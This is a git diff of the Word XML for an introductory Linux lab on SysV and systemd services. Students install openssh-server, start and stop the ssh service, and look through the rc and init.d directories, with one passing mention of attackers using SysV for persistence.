--- a/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
+++ b/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -17,6 +17,37 @@
       </w:pPr>
       <w:r>
         <w:t>Read</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In Canvas</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, read</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">     </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Apps and Services--SysV</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.pdf</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">     </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Linux Systemd</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.pdf</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -36,151 +67,162 @@
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:r>
         <w:t>Do the exercises in the CyberAces module!</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In Canvas</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, read</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve">These slide decks attempt to give you a feeling of where the SysV and systemd come from and the basics of how they work.  There may be more detail than you really want.  The most important things are the day to day </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>uses:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">  starting, stopping, and restarting services, so concentrate on those items.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Please execute the commands as you see them in this lesson to gain practice.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>There is no built-in GUI for systemd, so it is especially good to know basic systemd commands.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Notes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>reboot</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> so they don’t lose their hold on the computer.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(The security term for this is persistence.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This lab was tested on Ubuntu 18.04 LTS.  It should work well with most Linux versions that run systemd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Practice with SSH server on your VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">We would like to have a “tame” service that we can start, stop, and restart without adverse effects on our operating system.  If you were to just pick a service at random, you might </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">crash </w:t>
+      </w:r>
+      <w:r>
+        <w:t>your OS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">We </w:t>
+      </w:r>
+      <w:r>
+        <w:t>might</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> use</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SSH server</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in later labs, so we’ll install it for practice</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  SSH requires t</w:t>
+      </w:r>
+      <w:r>
+        <w:t>w</w:t>
+      </w:r>
+      <w:r>
+        <w:t>o parts to work</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the SSH server listens for incoming connections and the SSH client</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (or agent)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is used to connect to a server.  The SSH client is installed on our Ubuntu 18 desktop, but the server is not.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>openssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> you can install it very quickly from the command line.</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">     </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Apps and Services--SysV</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.pdf</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">     </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Linux Systemd</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.pdf</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">These slide decks attempt to give you a feeling of where the SysV and systemd come from and the basics of how they work.  There may be more detail than you really want.  The most important things are the day to day uses:  starting, stopping, and restarting services, so concentrate on those items.  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Please execute the commands as you see them in this lesson to gain practice.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>There is no built-in GUI for systemd, so it is especially good to know basic systemd commands.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Notes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at reboot so they don’t lose their hold on the computer.  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(The security term for this is persistence.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This lab was tested on Ubuntu 18.04 LTS.  It should work well with most Linux versions that run systemd.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Practice with SSH server on your VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">We would like to have a “tame” service that we can start, stop, and restart without adverse effects on our operating system.  If you were to just pick a service at random, you might </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">crash </w:t>
-      </w:r>
-      <w:r>
-        <w:t>your OS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">We </w:t>
-      </w:r>
-      <w:r>
-        <w:t>might</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> use</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SSH server</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in later labs, so we’ll install it for practice</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  SSH requires t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>w</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o parts to work</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the SSH server listens for incoming connections and the SSH client</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (or agent)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is used to connect to a server.  The SSH client is installed on our Ubuntu 18 desktop, but the server is not.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called openssh-server.  You can find it in the Ubuntu Software Center GUI, or, you can install it very quickly from the command line.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>sudo apt-get install openssh-server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo apt-get install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>openssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>-server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -231,8 +273,47 @@
         <w:t xml:space="preserve">Note:  The executable that the SSH server runs is called </w:t>
       </w:r>
       <w:r>
-        <w:t>/usr/sbin/sshd</w:t>
-      </w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sbin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -240,7 +321,15 @@
         <w:t>for SSH Daemon.  The service</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called sshd.  Go figure.</w:t>
+        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.  Go figure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -339,7 +428,15 @@
         <w:t xml:space="preserve"> command </w:t>
       </w:r>
       <w:r>
-        <w:t>to stop, start, and restart the sshd service.  Each time you change the service, use</w:t>
+        <w:t xml:space="preserve">to stop, start, and restart the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> service.  Each time you change the service, use</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -366,7 +463,21 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>When you are done, make sure the sshd service is stopped.</w:t>
+        <w:t xml:space="preserve">When you are done, make sure the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> service is stopped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -377,10 +488,26 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ls /etc</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the rc </w:t>
+        <w:t>ls /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>directories</w:t>
@@ -404,7 +531,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ls -l /etc/rc</w:t>
+        <w:t>ls -l /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/rc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -475,34 +616,131 @@
         <w:t>The symbolic links</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (symlinks)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in /etc/rc</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/rc</w:t>
       </w:r>
       <w:r>
         <w:t>5</w:t>
       </w:r>
       <w:r>
-        <w:t>.d point to files in the /etc/init and /etc/init</w:t>
+        <w:t>.d point to files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t>d directories.  Look at the contents of those directories as well.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /etc/init.d directori</w:t>
+        <w:t>d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories.  Look at the contents of those directories as well.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>directori</w:t>
       </w:r>
       <w:r>
         <w:t>y</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>, you will see it contains a shell script.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  Remember, in SysV the init program looks at the files in the proper run level directory and then executes the files the symlinks point to.  It uses symlinks to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
+        <w:t xml:space="preserve">  Remember, in SysV the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> program looks at the files in the proper run level directory and then executes the files the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> point to.  It uses </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -558,77 +796,211 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no init directory, since init is the name of the command used to change </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> directory, since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 5) </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
+        <w:t xml:space="preserve"> is the name of the command used to change </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>/etc/rc.d/rc5.d</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
+        <w:t>run level</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>.  There is a</w:t>
+        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>n</w:t>
+        <w:t>run level</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /etc/rc5.d, but it is just a symlink that points to </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> 5) </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>/etc/rc.d/rc5.d.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>To ease the burden of keeping track of the symlinks in the rc.d directories</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.  There is a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/rc5.d, but it is just a symlink that points to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
